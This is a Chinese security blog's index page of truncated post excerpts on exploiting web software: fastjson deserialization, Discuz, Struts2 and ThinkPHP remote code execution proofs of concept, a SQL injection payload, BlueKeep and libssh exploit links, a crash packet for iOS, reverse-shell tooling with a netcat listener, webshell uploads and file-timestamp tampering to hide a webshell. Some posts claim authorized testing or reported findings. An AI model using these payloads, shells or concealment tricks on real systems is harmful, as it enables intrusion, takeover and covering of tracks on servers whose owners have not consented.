-
fastjson =< 1.2.47 反序列化漏洞浅析
POC``` {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl&…- 11.9k
- 0
-
discuz ml v3.x cookie rce POC
# -*- coding: utf-8 -*- #Author: key #Team: Mystery Security Team #Blog: gh0st.cn #Email: [email protected] #Usage: python poc.py url import requests,sys def poc(url): u = url + "/forum.php?language…- 2k
- 0
-
Karenderia CMS 5.3注入exp
Karenderia CMS 5.3 POC:1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22%2f EXP:http://localhost/kmr…- 1.6k
- 0
-
-
CVE-2019-0708
最近流传出的相关利用工具 狗群友们积极测试并反馈 结局::::::。。。。 0708 exp 针对xp系统 https://github.com/Ekultek/BlueKeep Win7蓝屏 https://github.com/n1xbyte/CVE-2019-0708- 2.2k
- 0
-
某学校的一次漏洞挖掘
目标:http://xxx.edu.cn/ 简单测了一下 一处Nginx FastCGI的洞 (可以理解成解析漏洞) 看一下漏洞形成: 图片可解析为php执行 那就需要找地方利用了 需要上传一图片马儿 一般 在留言处、个人中心修改头像等 可上传图片 来到注册页 注册账号 注册成功 来到个人中心 可以看到修改头像按钮 上传如图: 当截切后 图片会变 所以此时需要burp Shell 已报送~二测已修…- 2.5k
- 0
-
年前的一次授权渗透测试
00x01 信息 目标:某省电视台 环境:外网 目标数量:2 当时请假了,于是没赶上,(阵容强大,内容可能会引起不适,请关闭页面)部门同事们也是No.1,秒shell了一个。 Jsp马儿,administrator权限 机器: 权限: 端口开放: Emmmmmmm…. 我也看到有445了…但打不动 进程: 内网开放3389,内网装有亚信 00x02 Msf利用 使用msfvenom生成后门,其中x…- 2.8k
- 0
-
渗透测试时关于文件时间的小技巧
前题 我们都知道每个文件都有三个时间属性,分别为创建时间,上次修改时间,上次访问时间。我们可以使用powershell命令查看文件的所有属性(ls)[0]|fl *命令解析:以列表的形式展示当前目录第一个文件的所有信息 渗透测试 shell.php是一个一句话木马的php文件,代码如下,使用菜刀连接后右键可以修改文件(夹)时间,我们将时间修改为2017年 然后我们再来看一下该文件属性 发现菜刀只是…- 9k
- 0
-
"全套一条龙服务"之低权限dedecms的沦陷
注:本文所有操作涉及到实战,仅分享思路,本文提到所有内容操作均与客户沟通拿到授权书后,进行的渗透测试 这几天在做某项目,一套组合拳下来,于是写篇文章。 整体过程不是很复杂,目标从开始到结束大概三天时间, 目标:www.xxx.gov.cn 套件:Apache Tomcat、php7、dedecms(二次开发) 端口、爆破 就不细讲了 Dedecms 二次开发 第一天: 某接口存在sql注入 数据库…- 2.6k
- 0
-
CVE-2018-1273 漏洞分析
漏洞背景: 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行的CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 受影响的版本: · Sprin…- 3.7k
- 0
-
Tomcat弱口令拿shell漏洞复现
一、漏洞复现前提条件 ps:本次搭建的Tomcat版本是Apache Tomcat/7.0.56 (1)首先tomcat web管理界面开启 (2)tomcat管理账号和密码均可以远程登录,本次使用的默认账号密码是tomcat/tomcat,登录成功如下图所示。 在这需要说明一下,一般默认安装的tomcat,虽然有web登录界面,但是默认账号和密码是无法登陆的,这时需要修改tomcat-users…- 3.4k
- 0
-
thinkphp5远程代码执行复现
0x01前言 12 月 10 日,ThinkPHP 官方发布了安全更新,其中修复了 ThinkPHP5 框架的一个高危漏洞: https://blog.thinkphp.cn/869075 0x02 漏洞复现: zoomeye搜索关键字“你值得信赖的PHP框架” ,搜到424个thinkphp5的站: 找个国外地址作为目标: exp: ?s=index/\think\Request/input&a…- 2.7k
- 0
-
基于BS架构的自动化反弹shell
这是一个node.js脚本改的python工具,攻击者搭建服务器先运行该程序,会启动一个web服务。然后只需在目标机器中对服务器发起请求,提交反弹shell的地址和端口,会自动返回构造好的shell命令然后逐个测试,直到命令成功执行。 运行方法: VPS / Domain : python Get_Reverse_Shell.py Attacker: nc -lvp [reverse_port] …- 1.1k
- 0
-
python识别图形验证码bug解决笔记
0x01:前言 做测试的时候遇到一些登录系统的页面有图形验证码,例如: 验证码就是防止恶意攻击者使用程序对系统批量枚举账号密码的。 把之前遇到的坑在这里记录一下。 0x02:安装python识别库遇到的坑 这里直接把我之前做的笔记截图贴出来,不打字了。 1.1第一个坑:要改绝对路径 1.2第二个坑: 遇到报错:’NoneType’ object has no attribute ‘bands’ 找…- 2k
- 0
-
CVE-2018-4407(IOS缓冲区溢出漏洞)exp
pip install scapy //安装scapy import scapy from scapy.all import * send(IP(dst="192.168.43.145",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2…- 2.6k
- 0
-
SSH登录验证绕过漏洞(附exp)CVE-2018-10933
利用这个漏洞,攻击者可以在没有密钥的情况下成功进行身份验证并获取受影响服务器的 shell。 libssh 官方的安全公告 https://www.libssh.org/security/advisories/CVE-2018-10933.txt 攻击代码 https://github.com/blacknbunny/libSSH-Authentication-Bypass- 6.3k
- 0
-
Windows内网渗透提权的几个实用命令
这不是一篇渗透测试指导,而是简单介绍了几个Windows内网提权的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。 1.获取操作系统信息 识别操作系统名称及版本: C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" OS Name: Microsoft Windo…- 1.6k
- 0
-
Struts2-057(验证POC+exp)
验证POC下载 #coding=utf-8 import requests import re import sys def check_vul(url): charType = sys.getfilesystemencoding() url_piece = url.split('/') url_piece[-2] = url_piece[-2]+"/"+ …- 3.2k
- 0
幸运之星正在降临...
点击领取今天的签到奖励!
恭喜!您今天获得了{{mission.data.mission.credit}}积分
我的优惠劵
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×
没有优惠劵可用!